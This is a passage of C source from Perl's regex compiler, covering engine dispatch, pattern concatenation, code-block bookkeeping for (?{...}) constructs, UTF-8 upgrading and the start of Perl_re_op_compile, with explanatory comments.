(data.flags & SCF_TRIE_RESTUDY) \
&& ! restudied++ \
) { \
dOsomething; \
goto reStudy; \
} \
} STMT_END
#else
#define CHECK_RESTUDY_GOTO_butfirst
#endif
/*
* pregcomp - compile a regular expression into internal code
*
* Decides which engine's compiler to call based on the hint currently in
* scope
*/
#ifndef PERL_IN_XSUB_RE
/* return the currently in-scope regex engine (or the default if none) */
regexp_engine const *
Perl_current_re_engine(pTHX)
{
if (IN_PERL_COMPILETIME) {
HV * const table = GvHV(PL_hintgv);
SV **ptr;
if (!table || !(PL_hints & HINT_LOCALIZE_HH))
return &PL_core_reg_engine;
ptr = hv_fetchs(table, "regcomp", FALSE);
if ( !(ptr && SvIOK(*ptr) && SvIV(*ptr)))
return &PL_core_reg_engine;
return INT2PTR(regexp_engine*, SvIV(*ptr));
}
else {
SV *ptr;
if (!PL_curcop->cop_hints_hash)
return &PL_core_reg_engine;
ptr = cop_hints_fetch_pvs(PL_curcop, "regcomp", 0);
if ( !(ptr && SvIOK(ptr) && SvIV(ptr)))
return &PL_core_reg_engine;
return INT2PTR(regexp_engine*, SvIV(ptr));
}
}
REGEXP *
Perl_pregcomp(pTHX_ SV * const pattern, const U32 flags)
{
regexp_engine const *eng = current_re_engine();
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_PREGCOMP;
/* Dispatch a request to compile a regexp to correct regexp engine. */
DEBUG_COMPILE_r({
Perl_re_printf( aTHX_ "Using engine %" UVxf "\n",
PTR2UV(eng));
});
return CALLREGCOMP_ENG(eng, pattern, flags);
}
#endif
/* public(ish) entry point for the perl core's own regex compiling code.
* It's actually a wrapper for Perl_re_op_compile that only takes an SV
* pattern rather than a list of OPs, and uses the internal engine rather
* than the current one */
REGEXP *
Perl_re_compile(pTHX_ SV * const pattern, U32 rx_flags)
{
SV *pat = pattern; /* defeat constness! */
PERL_ARGS_ASSERT_RE_COMPILE;
return Perl_re_op_compile(aTHX_ &pat, 1, NULL,
#ifdef PERL_IN_XSUB_RE
&my_reg_engine,
#else
&PL_core_reg_engine,
#endif
NULL, NULL, rx_flags, 0);
}
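/* Drop one reference to a reg_code_blocks list; when the last reference is
 * released, also release the source regexp captured for each block and free
 * the list itself. */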
static void
S_free_codeblocks(pTHX_ struct reg_code_blocks *cbs)
{
int n;
if (--cbs->refcnt > 0)
return;
for (n = 0; n < cbs->count; n++) {
REGEXP *rx = cbs->cb[n].src_regex;
if (rx) {
cbs->cb[n].src_regex = NULL;
SvREFCNT_dec_NN(rx);
}
}
Safefree(cbs->cb);
Safefree(cbs);
}
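/* Allocate a reference-counted list with room for 'ncode' code blocks, and
 * arrange via SAVEDESTRUCTOR_X for it to be released when the enclosing
 * scope is unwound. */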
static struct reg_code_blocks *
S_alloc_code_blocks(pTHX_ int ncode)
{
struct reg_code_blocks *cbs;
Newx(cbs, 1, struct reg_code_blocks);
cbs->count = ncode;
cbs->refcnt = 1;
SAVEDESTRUCTOR_X(S_free_codeblocks, cbs);
if (ncode)
Newx(cbs->cb, ncode, struct reg_code_block);
else
cbs->cb = NULL;
return cbs;
}
/* upgrade pattern pat_p of length plen_p to UTF8, and if there are code
* blocks, recalculate the indices. Update pat_p and plen_p in-place to
* point to the realloced string and length.
*
* This is essentially a copy of Perl_bytes_to_utf8() with the code index
* stuff added */
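/* For example (ASCII platforms): a Latin-1 byte such as 0xE9 becomes the two
 * bytes 0xC3 0xA9 under UTF-8, so the start/end byte offsets of any code
 * blocks that follow it must be bumped accordingly, which is what the copy
 * loop below does. */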
static void
S_pat_upgrade_to_utf8(pTHX_ RExC_state_t * const pRExC_state,
char **pat_p, STRLEN *plen_p, int num_code_blocks)
{
U8 *const src = (U8*)*pat_p;
U8 *dst, *d;
int n=0;
STRLEN s = 0;
bool do_end = 0;
GET_RE_DEBUG_FLAGS_DECL;
DEBUG_PARSE_r(Perl_re_printf( aTHX_
"UTF8 mismatch! Converting to utf8 for resizing and compile\n"));
/* 1 for each byte + 1 for each byte that expands to two, + trailing NUL */
Newx(dst, *plen_p + variant_under_utf8_count(src, src + *plen_p) + 1, U8);
d = dst;
while (s < *plen_p) {
append_utf8_from_native_byte(src[s], &d);
if (n < num_code_blocks) {
assert(pRExC_state->code_blocks);
if (!do_end && pRExC_state->code_blocks->cb[n].start == s) {
pRExC_state->code_blocks->cb[n].start = d - dst - 1;
assert(*(d - 1) == '(');
do_end = 1;
}
else if (do_end && pRExC_state->code_blocks->cb[n].end == s) {
pRExC_state->code_blocks->cb[n].end = d - dst - 1;
assert(*(d - 1) == ')');
do_end = 0;
n++;
}
}
s++;
}
*d = '\0';
*plen_p = d - dst;
*pat_p = (char*) dst;
SAVEFREEPV(*pat_p);
RExC_orig_utf8 = RExC_utf8 = 1;
}
/* S_concat_pat(): concatenate a list of args to the pattern string pat,
* while recording any code block indices, and handling overloading,
* nested qr// objects etc. If pat is null, it will allocate a new
* string, or just return the first arg, if there's only one.
*
* Returns the malloced/updated pat.
 * patternp and pat_count describe the array of SVs to be concatenated;
* oplist is the optional list of ops that generated the SVs;
* recompile_p is a pointer to a boolean that will be set if
* the regex will need to be recompiled.
* delim, if non-null is an SV that will be inserted between each element
*/
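/* Illustrative example: for a pattern written as /foo @bar (?{ CODE })/, the
 * args are the literal chunks, the interpolated array (whose elements are
 * joined with $"), and the code-block SV; they are concatenated here into a
 * single pattern string while the byte offsets of each (?{...}) block are
 * recorded in pRExC_state->code_blocks. */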
static SV*
S_concat_pat(pTHX_ RExC_state_t * const pRExC_state,
SV *pat, SV ** const patternp, int pat_count,
OP *oplist, bool *recompile_p, SV *delim)
{
SV **svp;
int n = 0;
bool use_delim = FALSE;
bool alloced = FALSE;
/* if we know we have at least two args, create an empty string,
* then concatenate args to that. For no args, return an empty string */
if (!pat && pat_count != 1) {
pat = newSVpvs("");
SAVEFREESV(pat);
alloced = TRUE;
}
for (svp = patternp; svp < patternp + pat_count; svp++) {
SV *sv;
SV *rx = NULL;
STRLEN orig_patlen = 0;
bool code = 0;
SV *msv = use_delim ? delim : *svp;
if (!msv) msv = &PL_sv_undef;
/* if we've got a delimiter, we go round the loop twice for each
* svp slot (except the last), using the delimiter the second
* time round */
if (use_delim) {
svp--;
use_delim = FALSE;
}
else if (delim)
use_delim = TRUE;
if (SvTYPE(msv) == SVt_PVAV) {
/* we've encountered an interpolated array within
* the pattern, e.g. /...@a..../. Expand the list of elements,
* then recursively append elements.
* The code in this block is based on S_pushav() */
AV *const av = (AV*)msv;
const SSize_t maxarg = AvFILL(av) + 1;
SV **array;
if (oplist) {
assert(oplist->op_type == OP_PADAV
|| oplist->op_type == OP_RV2AV);
oplist = OpSIBLING(oplist);
}
if (SvRMAGICAL(av)) {
SSize_t i;
Newx(array, maxarg, SV*);
SAVEFREEPV(array);
for (i=0; i < maxarg; i++) {
SV ** const svp = av_fetch(av, i, FALSE);
array[i] = svp ? *svp : &PL_sv_undef;
}
}
else
array = AvARRAY(av);
pat = S_concat_pat(aTHX_ pRExC_state, pat,
array, maxarg, NULL, recompile_p,
/* $" */
GvSV((gv_fetchpvs("\"", GV_ADDMULTI, SVt_PV))));
continue;
}
/* we make the assumption here that each op in the list of
* op_siblings maps to one SV pushed onto the stack,
     * except for code blocks, which have both an OP_NULL
     * and an OP_CONST.
* This allows us to match up the list of SVs against the
* list of OPs to find the next code block.
*
* Note that PUSHMARK PADSV PADSV ..
* is optimised to
* PADRANGE PADSV PADSV ..
* so the alignment still works. */
if (oplist) {
if (oplist->op_type == OP_NULL
&& (oplist->op_flags & OPf_SPECIAL))
{
assert(n < pRExC_state->code_blocks->count);
pRExC_state->code_blocks->cb[n].start = pat ? SvCUR(pat) : 0;
pRExC_state->code_blocks->cb[n].block = oplist;
pRExC_state->code_blocks->cb[n].src_regex = NULL;
n++;
code = 1;
oplist = OpSIBLING(oplist); /* skip CONST */
assert(oplist);
}
            oplist = OpSIBLING(oplist);
}
/* apply magic and QR overloading to arg */
SvGETMAGIC(msv);
if (SvROK(msv) && SvAMAGIC(msv)) {
SV *sv = AMG_CALLunary(msv, regexp_amg);
if (sv) {
if (SvROK(sv))
sv = SvRV(sv);
if (SvTYPE(sv) != SVt_REGEXP)
Perl_croak(aTHX_ "Overloaded qr did not return a REGEXP");
msv = sv;
}
}
/* try concatenation overload ... */
if (pat && (SvAMAGIC(pat) || SvAMAGIC(msv)) &&
(sv = amagic_call(pat, msv, concat_amg, AMGf_assign)))
{
sv_setsv(pat, sv);
/* overloading involved: all bets are off over literal
* code. Pretend we haven't seen it */
if (n)
pRExC_state->code_blocks->count -= n;
n = 0;
}
else {
/* ... or failing that, try "" overload */
while (SvAMAGIC(msv)
&& (sv = AMG_CALLunary(msv, string_amg))
&& sv != msv
&& !( SvROK(msv)
&& SvROK(sv)
&& SvRV(msv) == SvRV(sv))
) {
msv = sv;
SvGETMAGIC(msv);
}
if (SvROK(msv) && SvTYPE(SvRV(msv)) == SVt_REGEXP)
msv = SvRV(msv);
if (pat) {
/* this is a partially unrolled
* sv_catsv_nomg(pat, msv);
* that allows us to adjust code block indices if
* needed */
STRLEN dlen;
char *dst = SvPV_force_nomg(pat, dlen);
orig_patlen = dlen;
if (SvUTF8(msv) && !SvUTF8(pat)) {
S_pat_upgrade_to_utf8(aTHX_ pRExC_state, &dst, &dlen, n);
sv_setpvn(pat, dst, dlen);
SvUTF8_on(pat);
}
sv_catsv_nomg(pat, msv);
rx = msv;
}
else {
/* We have only one SV to process, but we need to verify
                 * it is properly null-terminated or we will fail asserts
                 * later. In theory we probably shouldn't get such SVs,
* but if we do we should handle it gracefully. */
if ( SvTYPE(msv) != SVt_PV || (SvLEN(msv) > SvCUR(msv) && *(SvEND(msv)) == 0) || SvIsCOW_shared_hash(msv) ) {
/* not a string, or a string with a trailing null */
pat = msv;
} else {
/* a string with no trailing null, we need to copy it
* so it has a trailing null */
pat = sv_2mortal(newSVsv(msv));
}
}
if (code)
pRExC_state->code_blocks->cb[n-1].end = SvCUR(pat)-1;
}
/* extract any code blocks within any embedded qr//'s */
if (rx && SvTYPE(rx) == SVt_REGEXP
&& RX_ENGINE((REGEXP*)rx)->op_comp)
{
RXi_GET_DECL(ReANY((REGEXP *)rx), ri);
if (ri->code_blocks && ri->code_blocks->count) {
int i;
/* the presence of an embedded qr// with code means
* we should always recompile: the text of the
* qr// may not have changed, but it may be a
* different closure than last time */
*recompile_p = 1;
if (pRExC_state->code_blocks) {
int new_count = pRExC_state->code_blocks->count
+ ri->code_blocks->count;
Renew(pRExC_state->code_blocks->cb,
new_count, struct reg_code_block);
pRExC_state->code_blocks->count = new_count;
}
else
pRExC_state->code_blocks = S_alloc_code_blocks(aTHX_
ri->code_blocks->count);
for (i=0; i < ri->code_blocks->count; i++) {
struct reg_code_block *src, *dst;
STRLEN offset = orig_patlen
+ ReANY((REGEXP *)rx)->pre_prefix;
assert(n < pRExC_state->code_blocks->count);
src = &ri->code_blocks->cb[i];
dst = &pRExC_state->code_blocks->cb[n];
dst->start = src->start + offset;
dst->end = src->end + offset;
dst->block = src->block;
dst->src_regex = (REGEXP*) SvREFCNT_inc( (SV*)
src->src_regex
? src->src_regex
: (REGEXP*)rx);
n++;
}
}
}
}
/* avoid calling magic multiple times on a single element e.g. =~ $qr */
if (alloced)
SvSETMAGIC(pat);
return pat;
}
/* see if there are any run-time code blocks in the pattern.
* False positives are allowed */
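/* (E.g. a pattern string still containing "(?{" or "(??{" outside of any
 * already-compiled literal code block will make this return true.) */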
static bool
S_has_runtime_code(pTHX_ RExC_state_t * const pRExC_state,
char *pat, STRLEN plen)
{
int n = 0;
STRLEN s;
PERL_UNUSED_CONTEXT;
for (s = 0; s < plen; s++) {
if ( pRExC_state->code_blocks
&& n < pRExC_state->code_blocks->count
&& s == pRExC_state->code_blocks->cb[n].start)
{
s = pRExC_state->code_blocks->cb[n].end;
n++;
continue;
}
/* TODO ideally should handle [..], (#..), /#.../x to reduce false
* positives here */
if (pat[s] == '(' && s+2 <= plen && pat[s+1] == '?' &&
(pat[s+2] == '{'
|| (s + 2 <= plen && pat[s+2] == '?' && pat[s+3] == '{'))
)
return 1;
}
return 0;
}
/* Handle run-time code blocks. We will already have compiled any direct
* or indirect literal code blocks. Now, take the pattern 'pat' and make a
* copy of it, but with any literal code blocks blanked out and
* appropriate chars escaped; then feed it into
*
* eval "qr'modified_pattern'"
*
* For example,
*
* a\bc(?{"this was literal"})def'ghi\\jkl(?{"this is runtime"})mno
*
* becomes
*
* qr'a\\bc_______________________def\'ghi\\\\jkl(?{"this is runtime"})mno'
*
* After eval_sv()-ing that, grab any new code blocks from the returned qr
* and merge them with any code blocks of the original regexp.
*
* If the pat is non-UTF8, while the evalled qr is UTF8, don't merge;
* instead, just save the qr and return FALSE; this tells our caller that
* the original pattern needs upgrading to utf8.
*/
static bool
S_compile_runtime_code(pTHX_ RExC_state_t * const pRExC_state,
char *pat, STRLEN plen)
{
SV *qr;
GET_RE_DEBUG_FLAGS_DECL;
if (pRExC_state->runtime_code_qr) {
/* this is the second time we've been called; this should
* only happen if the main pattern got upgraded to utf8
* during compilation; re-use the qr we compiled first time
* round (which should be utf8 too)
*/
qr = pRExC_state->runtime_code_qr;
pRExC_state->runtime_code_qr = NULL;
assert(RExC_utf8 && SvUTF8(qr));
}
else {
int n = 0;
STRLEN s;
char *p, *newpat;
int newlen = plen + 7; /* allow for "qr''xx\0" extra chars */
SV *sv, *qr_ref;
dSP;
/* determine how many extra chars we need for ' and \ escaping */
for (s = 0; s < plen; s++) {
if (pat[s] == '\'' || pat[s] == '\\')
newlen++;
}
Newx(newpat, newlen, char);
p = newpat;
*p++ = 'q'; *p++ = 'r'; *p++ = '\'';
for (s = 0; s < plen; s++) {
if ( pRExC_state->code_blocks
&& n < pRExC_state->code_blocks->count
&& s == pRExC_state->code_blocks->cb[n].start)
{
                /* blank out literal code blocks so that they aren't
* recompiled: eg change from/to:
* /(?{xyz})/
* /(?=====)/
* and
* /(??{xyz})/
* /(?======)/
* and
* /(?(?{xyz}))/
* /(?(?=====))/
*/
assert(pat[s] == '(');
assert(pat[s+1] == '?');
*p++ = '(';
*p++ = '?';
s += 2;
while (s < pRExC_state->code_blocks->cb[n].end) {
*p++ = '=';
s++;
}
*p++ = ')';
n++;
continue;
}
if (pat[s] == '\'' || pat[s] == '\\')
*p++ = '\\';
*p++ = pat[s];
}
*p++ = '\'';
if (pRExC_state->pm_flags & RXf_PMf_EXTENDED) {
*p++ = 'x';
if (pRExC_state->pm_flags & RXf_PMf_EXTENDED_MORE) {
*p++ = 'x';
}
}
*p++ = '\0';
DEBUG_COMPILE_r({
Perl_re_printf( aTHX_
"%sre-parsing pattern for runtime code:%s %s\n",
PL_colors[4], PL_colors[5], newpat);
});
sv = newSVpvn_flags(newpat, p-newpat-1, RExC_utf8 ? SVf_UTF8 : 0);
Safefree(newpat);
ENTER;
SAVETMPS;
save_re_context();
PUSHSTACKi(PERLSI_REQUIRE);
/* G_RE_REPARSING causes the toker to collapse \\ into \ when
* parsing qr''; normally only q'' does this. It also alters
* hints handling */
eval_sv(sv, G_SCALAR|G_RE_REPARSING);
SvREFCNT_dec_NN(sv);
SPAGAIN;
qr_ref = POPs;
PUTBACK;
{
SV * const errsv = ERRSV;
if (SvTRUE_NN(errsv))
/* use croak_sv ? */
Perl_croak_nocontext("%" SVf, SVfARG(errsv));
}
assert(SvROK(qr_ref));
qr = SvRV(qr_ref);
assert(SvTYPE(qr) == SVt_REGEXP && RX_ENGINE((REGEXP*)qr)->op_comp);
/* the leaving below frees the tmp qr_ref.
* Give qr a life of its own */
SvREFCNT_inc(qr);
POPSTACK;
FREETMPS;
LEAVE;
}
if (!RExC_utf8 && SvUTF8(qr)) {
/* first time through; the pattern got upgraded; save the
* qr for the next time through */
assert(!pRExC_state->runtime_code_qr);
pRExC_state->runtime_code_qr = qr;
return 0;
}
/* extract any code blocks within the returned qr// */
/* merge the main (r1) and run-time (r2) code blocks into one */
{
RXi_GET_DECL(ReANY((REGEXP *)qr), r2);
struct reg_code_block *new_block, *dst;
RExC_state_t * const r1 = pRExC_state; /* convenient alias */
int i1 = 0, i2 = 0;
int r1c, r2c;
if (!r2->code_blocks || !r2->code_blocks->count) /* we guessed wrong */
{
SvREFCNT_dec_NN(qr);
return 1;
}
if (!r1->code_blocks)
r1->code_blocks = S_alloc_code_blocks(aTHX_ 0);
r1c = r1->code_blocks->count;
r2c = r2->code_blocks->count;
Newx(new_block, r1c + r2c, struct reg_code_block);
dst = new_block;
while (i1 < r1c || i2 < r2c) {
struct reg_code_block *src;
bool is_qr = 0;
if (i1 == r1c) {
src = &r2->code_blocks->cb[i2++];
is_qr = 1;
}
else if (i2 == r2c)
src = &r1->code_blocks->cb[i1++];
else if ( r1->code_blocks->cb[i1].start
< r2->code_blocks->cb[i2].start)
{
src = &r1->code_blocks->cb[i1++];
assert(src->end < r2->code_blocks->cb[i2].start);
}
else {
assert( r1->code_blocks->cb[i1].start
> r2->code_blocks->cb[i2].start);
src = &r2->code_blocks->cb[i2++];
is_qr = 1;
assert(src->end < r1->code_blocks->cb[i1].start);
}
assert(pat[src->start] == '(');
assert(pat[src->end] == ')');
dst->start = src->start;
dst->end = src->end;
dst->block = src->block;
dst->src_regex = is_qr ? (REGEXP*) SvREFCNT_inc( (SV*) qr)
: src->src_regex;
dst++;
}
r1->code_blocks->count += r2c;
Safefree(r1->code_blocks->cb);
r1->code_blocks->cb = new_block;
}
SvREFCNT_dec_NN(qr);
return 1;
}
STATIC bool
S_setup_longest(pTHX_ RExC_state_t *pRExC_state,
struct reg_substr_datum *rsd,
struct scan_data_substrs *sub,
STRLEN longest_length)
{
/* This is the common code for setting up the floating and fixed length
* string data extracted from Perl_re_op_compile() below. Returns a boolean
* as to whether succeeded or not */
I32 t;
SSize_t ml;
bool eol = cBOOL(sub->flags & SF_BEFORE_EOL);
bool meol = cBOOL(sub->flags & SF_BEFORE_MEOL);
if (! (longest_length
|| (eol /* Can't have SEOL and MULTI */
&& (! meol || (RExC_flags & RXf_PMf_MULTILINE)))
)
/* See comments for join_exact for why REG_UNFOLDED_MULTI_SEEN */
|| (RExC_seen & REG_UNFOLDED_MULTI_SEEN))
{
return FALSE;
}
/* copy the information about the longest from the reg_scan_data
over to the program. */
if (SvUTF8(sub->str)) {
rsd->substr = NULL;
rsd->utf8_substr = sub->str;
} else {
rsd->substr = sub->str;
rsd->utf8_substr = NULL;
}
/* end_shift is how many chars that must be matched that
follow this item. We calculate it ahead of time as once the
lookbehind offset is added in we lose the ability to correctly
calculate it.*/
ml = sub->minlenp ? *(sub->minlenp) : (SSize_t)longest_length;
rsd->end_shift = ml - sub->min_offset
- longest_length
/* XXX SvTAIL is always false here - did you mean FBMcf_TAIL
     * instead? - DAPM
+ (SvTAIL(sub->str) != 0)
*/
+ sub->lookbehind;
t = (eol/* Can't have SEOL and MULTI */
&& (! meol || (RExC_flags & RXf_PMf_MULTILINE)));
fbm_compile(sub->str, t ? FBMcf_TAIL : 0);
return TRUE;
}
STATIC void
S_set_regex_pv(pTHX_ RExC_state_t *pRExC_state, REGEXP *Rx)
{
/* Calculates and sets in the compiled pattern 'Rx' the string to compile,
* properly wrapped with the right modifiers */
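    /* E.g. a pattern compiled with /i and no explicit charset modifier will
     * typically be wrapped as "(?^i:pattern)"; the exact prefix depends on
     * which flags and charset are in effect (illustrative only). */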
bool has_p = ((RExC_rx->extflags & RXf_PMf_KEEPCOPY) == RXf_PMf_KEEPCOPY);
bool has_charset = RExC_utf8 || (get_regex_charset(RExC_rx->extflags)
!= REGEX_DEPENDS_CHARSET);
/* The caret is output if there are any defaults: if not all the STD
* flags are set, or if no character set specifier is needed */
bool has_default =
(((RExC_rx->extflags & RXf_PMf_STD_PMMOD) != RXf_PMf_STD_PMMOD)
|| ! has_charset);
bool has_runon = ((RExC_seen & REG_RUN_ON_COMMENT_SEEN)
== REG_RUN_ON_COMMENT_SEEN);
U8 reganch = (U8)((RExC_rx->extflags & RXf_PMf_STD_PMMOD)
>> RXf_PMf_STD_PMMOD_SHIFT);
const char *fptr = STD_PAT_MODS; /*"msixxn"*/
char *p;
STRLEN pat_len = RExC_precomp_end - RExC_precomp;
/* We output all the necessary flags; we never output a minus, as all
* those are defaults, so are
* covered by the caret */
const STRLEN wraplen = pat_len + has_p + has_runon
+ has_default /* If needs a caret */
+ PL_bitcount[reganch] /* 1 char for each set standard flag */
/* If needs a character set specifier */
+ ((has_charset) ? MAX_CHARSET_NAME_LENGTH : 0)
+ (sizeof("(?:)") - 1);
PERL_ARGS_ASSERT_SET_REGEX_PV;
/* make sure PL_bitcount bounds not exceeded */
assert(sizeof(STD_PAT_MODS) <= 8);
p = sv_grow(MUTABLE_SV(Rx), wraplen + 1); /* +1 for the ending NUL */
SvPOK_on(Rx);
if (RExC_utf8)
SvFLAGS(Rx) |= SVf_UTF8;
*p++='('; *p++='?';
/* If a default, cover it using the caret */
if (has_default) {
*p++= DEFAULT_PAT_MOD;
}
if (has_charset) {
STRLEN len;
const char* name;
name = get_regex_charset_name(RExC_rx->extflags, &len);
        if (strEQ(name, DEPENDS_PAT_MODS)) {  /* /d under UTF-8 => /u */
assert(RExC_utf8);
name = UNICODE_PAT_MODS;
len = sizeof(UNICODE_PAT_MODS) - 1;
}
Copy(name, p, len, char);
p += len;
}
if (has_p)
*p++ = KEEPCOPY_PAT_MOD; /*'p'*/
{
char ch;
while((ch = *fptr++)) {
if(reganch & 1)
*p++ = ch;
reganch >>= 1;
}
}
*p++ = ':';
Copy(RExC_precomp, p, pat_len, char);
assert ((RX_WRAPPED(Rx) - p) < 16);
RExC_rx->pre_prefix = p - RX_WRAPPED(Rx);
p += pat_len;
/* Adding a trailing \n causes this to compile properly:
my $R = qr / A B C # D E/x; /($R)/
Otherwise the parens are considered part of the comment */
if (has_runon)
*p++ = '\n';
*p++ = ')';
*p = 0;
SvCUR_set(Rx, p - RX_WRAPPED(Rx));
}
/*
* Perl_re_op_compile - the perl internal RE engine's function to compile a
* regular expression into internal code.
* The pattern may be passed either as:
* a list of SVs (patternp plus pat_count)
* a list of OPs (expr)
* If both are passed, the SV list is used, but the OP list indicates
* which SVs are actually pre-compiled code blocks
*
* The SVs in the list have magic and qr overloading applied to them (and
* the list may be modified in-place with replacement SVs in the latter
* case).
*
* If the pattern hasn't changed from old_re, then old_re will be
* returned.
*
* eng is the current engine. If that engine has an op_comp method, then
* handle directly (i.e. we assume that op_comp was us); otherwise, just
* do the initial concatenation of arguments and pass on to the external
* engine.
*
* If is_bare_re is not null, set it to a boolean indicating whether the
* arg list reduced (after overloading) to a single bare regex which has
* been returned (i.e. /$qr/).
*
* orig_rx_flags contains RXf_* flags. See perlreapi.pod for more details.
*
* pm_flags contains the PMf_* flags, typically based on those from the
* pm_flags field of the related PMOP. Currently we're only interested in
* PMf_HAS_CV, PMf_IS_QR, PMf_USE_RE_EVAL.
*
* For many years this code had an initial sizing pass that calculated
* (sometimes incorrectly, leading to security holes) the size needed for the
* compiled pattern. That was changed by commit
* 7c932d07cab18751bfc7515b4320436273a459e2 in 5.29, which reallocs the size, a
* node at a time, as parsing goes along. Patches welcome to fix any obsolete
* references to this sizing pass.
*
* Now, an initial crude guess as to the size needed is made, based on the
* length of the pattern. Patches welcome to improve that guess. That amount
* of space is malloc'd and then immediately freed, and then clawed back node
 * by node.  This design is to minimize, to the extent possible, memory churn
 * when doing the reallocs.
*
* A separate parentheses counting pass may be needed in some cases.
* (Previously the sizing pass did this.) Patches welcome to reduce the number
* of these cases.
*
* The existence of a sizing pass necessitated design decisions that are no
* longer needed. There are potential areas of simplification.
*
* Beware that the optimization-preparation code in here knows about some
* of the structure of the compiled regexp. [I'll say.]
*/
REGEXP *
Perl_re_op_compile(pTHX_ SV ** const patternp, int pat_count,
OP *expr, const regexp_engine* eng, REGEXP *old_re,
bool *is_bare_re, const U32 orig_rx_flags, const U32 pm_flags)
{
dVAR;
REGEXP *Rx; /* Capital 'R' means points to a REGEXP */
STRLEN plen;
char *exp;
regnode *scan;
I32 flags;
SSize_t minlen = 0;
U32 rx_flags;
SV *pat;
SV** new_patternp = patternp;
/* these are all flags - maybe they should be turned
* into a single int with different bit masks */
I32 sawlookahead = 0;
I32 sawplus = 0;
I32 sawopen = 0;
I32 sawminmod = 0;
regex_charset initial_charset = get_regex_charset(orig_rx_flags);
bool recompile = 0;
bool runtime_code = 0;
scan_data_t data;
RExC_state_t RExC_state;
RExC_state_t * const pRExC_state = &RExC_state;
#ifdef TRIE_STUDY_OPT
int restudied = 0;
RExC_state_t copyRExC_state;
#endif
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_RE_OP_COMPILE;
DEBUG_r(if (!PL_colorset) reginitcolors());
    /* Initialize these here instead of as-needed, as it is quick and avoids
     * having to test them each time otherwise */
if (! PL_InBitmap) {
#ifdef DEBUGGING
char * dump_len_string;
#endif
/* This is calculated here, because the Perl program that generates the
* static global ones doesn't currently have access to
* NUM_ANYOF_CODE_POINTS */
PL_InBitmap = _new_invlist(2);
PL_InBitmap = _add_range_to_invlist(PL_InBitmap, 0,
NUM_ANYOF_CODE_POINTS - 1);
#ifdef DEBUGGING
dump_len_string = PerlEnv_getenv("PERL_DUMP_RE_MAX_LEN");
if ( ! dump_len_string
|| ! grok_atoUV(dump_len_string, (UV *)&PL_dump_re_max_len, NULL))
{
PL_dump_re_max_len = 60; /* A reasonable default */
}
#endif
}
pRExC_state->warn_text = NULL;
pRExC_state->unlexed_names = NULL;
pRExC_state->code_blocks = NULL;
if (is_bare_re)
*is_bare_re = FALSE;
if (expr && (expr->op_type == OP_LIST ||
(expr->op_type == OP_NULL && expr->op_targ == OP_LIST))) {
/* allocate code_blocks if needed */
OP *o;
int ncode = 0;
for (o = cLISTOPx(expr)->op_first; o; o = OpSIBLING(o))
if (o->op_type == OP_NULL && (o->op_flags & OPf_SPECIAL))
ncode++; /* count of DO blocks */
if (ncode)
pRExC_state->code_blocks = S_alloc_code_blocks(aTHX_ ncode);
}
if (!pat_count) {
/* compile-time pattern with just OP_CONSTs and DO blocks */
int n;
OP *o;
/* find how many CONSTs there are */
assert(expr);
n = 0;
if (expr->op_type == OP_CONST)
n = 1;
else
for (o = cLISTOPx(expr)->op_first; o; o = OpSIBLING(o)) {
if (o->op_type == OP_CONST)
n++;
}
/* fake up an SV array */
assert(!new_patternp);
Newx(new_patternp, n, SV*);
SAVEFREEPV(new_patternp);
pat_count = n;
n = 0;
if (expr->op_type == OP_CONST)
new_patternp[n] = cSVOPx_sv(expr);
else
for (o = cLISTOPx(expr)->op_first; o; o = OpSIBLING(o)) {
if (o->op_type == OP_CONST)
new_patternp[n++] = cSVOPo_sv;
}
}
DEBUG_PARSE_r(Perl_re_printf( aTHX_
"Assembling pattern from %d elements%s\n", pat_count,
orig_rx_flags & RXf_SPLIT ? " for split" : ""));
/* set expr to the first arg op */
if (pRExC_state->code_blocks && pRExC_state->code_blocks->count
&& expr->op_type != OP_CONST)
{
expr = cLISTOPx(expr)->op_first;
assert( expr->op_type == OP_PUSHMARK
|| (expr->op_type == OP_NULL && expr->op_targ == OP_PUSHMARK)
|| expr->op_type == OP_PADRANGE);
expr = OpSIBLING(expr);
}
pat = S_concat_pat(aTHX_ pRExC_state, NULL, new_patternp, pat_count,
expr, &recompile, NULL);
/* handle bare (possibly after overloading) regex: foo =~ $re */
{
SV *re = pat;
if (SvROK(re))
re = SvRV(re);
if (SvTYPE(re) == SVt_REGEXP) {
if (is_bare_re)
*is_bare_re = TRUE;
SvREFCNT_inc(re);
DEBUG_PARSE_r(Perl_re_printf( aTHX_
"Precompiled pattern%s\n",
orig_rx_flags & RXf_SPLIT ? " for split" : ""));
return (REGEXP*)re;
}
}
exp = SvPV_nomg(pat, plen);
if (!eng->op_comp) {
if ((SvUTF8(pat) && IN_BYTES)
|| SvGMAGICAL(pat) || SvAMAGIC(pat))
{
/* make a temporary copy; either to convert to bytes,
* or to avoid repeating get-magic / overloaded stringify */
pat = newSVpvn_flags(exp, plen, SVs_TEMP |
(IN_BYTES ? 0 : SvUTF8(pat)));
}
return CALLREGCOMP_ENG(eng, pat, orig_rx_flags);
}
/* ignore the utf8ness if the pattern is 0 length */
RExC_utf8 = RExC_orig_utf8 = (plen == 0 || IN_BYTES) ? 0 : SvUTF8(pat);
RExC_uni_semantics = 0;
RExC_contains_locale = 0;
RExC_strict = cBOOL(pm_flags & RXf_PMf_STRICT);
RExC_in_script_run = 0;
RExC_study_started = 0;
pRExC_state->runtime_code_qr = NULL;
RExC_frame_head= NULL;
RExC_frame_last= NULL;
RExC_frame_count= 0;
RExC_latest_warn_offset = 0;
RExC_use_BRANCHJ = 0;
RExC_total_parens = 0;
RExC_open_parens = NULL;
RExC_close_parens = NULL;
RExC_paren_names = NULL;
RExC_size = 0;
RExC_seen_d_op = FALSE;
#ifdef DEBUGGING
RExC_paren_name_list = NULL;
#endif
DEBUG_r({
RExC_mysv1= sv_newmortal();
RExC_mysv2= sv_newmortal();
});
DEBUG_COMPILE_r({
SV *dsv= sv_newmortal();
RE_PV_QUOTED_DECL(s, RExC_utf8, dsv, exp, plen, PL_dump_re_max_len);
Perl_re_printf( aTHX_ "%sCompiling REx%s %s\n",
PL_colors[4], PL_colors[5], s);
});
/* we jump here if we have to recompile, e.g., from upgrading the pattern
* to utf8 */
if ((pm_flags & PMf_USE_RE_EVAL)
/* this second condition covers the non-regex literal case,
* i.e. $foo =~ '(?{})'. */
|| (IN_PERL_COMPILETIME && (PL_hints & HINT_RE_EVAL))
)
runtime_code = S_has_runtime_code(aTHX_ pRExC_state, exp, plen);
redo_parse:
/* return old regex if pattern hasn't changed */
/* XXX: note in the below we have to check the flags as well as the
* pattern.
*
